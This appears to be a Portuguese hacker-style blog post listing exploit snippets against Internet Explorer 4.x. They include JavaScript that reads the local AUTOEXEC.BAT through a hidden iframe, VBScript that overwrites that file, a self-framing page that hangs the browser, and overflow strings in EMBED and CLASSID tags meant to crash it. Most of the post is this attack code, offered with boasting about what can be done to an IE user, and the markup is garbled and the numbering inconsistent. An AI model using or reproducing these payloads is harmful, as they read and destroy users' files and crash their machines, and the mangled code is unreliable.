Bugs do Explorer

Sem comentários »
HeHe é vc pode


fazer cada coisa com o cara que estiver usando o explorer que vc nem imagina, dá
até pra ver o autoexec do cara. A Microsoft com a pressa de seus lançamentos
fez cada burrada no explorer que descoberta por hackers fez com que desse para
explorar todas as falhas com simples scripts. Se vc quer se defender vc tem que
tirar o explorer 4.x ou inferior, no 5 as falhas diminuiram bastante mas se vc
quer nenhuma falha use o Google Chrome ou o Firefox que são excelentes navegadores. 
Aí está as falhas do IE:




#BUG 1#


#Esse bug no IE 4, faz com que em 5 segundos o conteudo

do

AUTOEXEC.BAT seja mostrado numa caixa de texto.

Demostrando q se esse

script

for usado para fins maliciosos, dados importantes podem

ser capturados.#

*HTML*

*HEAD*

*TITLE*

*/TITLE*

*/HEAD*

*BODY onLoad="init()"*

*SCRIPT LANGUAGE="JavaScript"*

function init()

{

document.all("MyFrame1").src = 'file://c:/autoexec.bat';

setTimeout ('getLinks()', 5000);

}



function getLinks()

{alert(document.all("MyFrame1").document.body.outerHTML);

}



*/SCRIPT*

*IFRAME STYLE="width=1px; height=1px;" NAME="MyFrame1"

SRC="blank.html"*

*/BODY*

*/HTML*
-----------------------------------------------


BUG 2#


Faz com que o IE entre em loop, abrindo a pagina bug.htm

infinitamente. Causando o seu travamento.

*HTML*

*HEAD*

*TITLE*

*/TITLE*

*/HEAD*

*FRAMESET ROWS = 50%,50%* v

*FRAME SRC = "bug.htm"*

*FRAME SRC = "bug.htm"*



*/FRAMESET*







*BODY*

*/BODY>

*/HTML>
------------------------------------------


#BUG 3# Vulnerable

: IE 4.x e VBScript Engine 3.x

Descricao: Com essa falha de seguranca na linguagem VBScript, vc

pode

rodar scripts maliciosos para sobreescrever arquivos.

*HTML>

*HEAD> */HEAD>

*BODY>*SCRIPT LANGUAGE="VBSCRIPT">



Set fs = CreateObject#"Scripting.FileSystemObject" #

Set a = fs.CreateTextFile#"C:\AUTOEXEC.BAT", True #

a.WriteLine#"@echo off"#

a.WriteLine#"echo This is a test."#

a.WriteLine#"pause"#

a.WriteLine#"@echo on"#

a.Close



*/SCRIPT>



O seu arquivo "AUTOEXEC.BAT" foi sobreescrito!



*/BODY>

*/HTML>
---------------------------------------------------


#BUG 4#


Vulnerable : IE 4.0

Descricao: Causa overflow no IE, e como decorrente o seu travamento.


*HTML>


SuCkEr!!!

*EMBED

SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456


7890123456789012345678901234567890123456789>






40

80

160 170 180

190 200

*/HTML>

------------------------------------------------


#BUG 7#




>>>Funciona com: IE 4.0

>>>Descricao: dah uma mensagem de Operacaum Ilegal e

fecha o browser ou

uma

tela azul de Erro Fatal e vc terah que rebootar a

maquina.

Trying to crash IE 4.0

CLASSID=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111


1111111111111111111111111111




1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111


1111111111111111111111




11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111



111>

0 comentários:

Enviar um comentário

Subscrever: Enviar feedback
Visit http://www.ipligence.com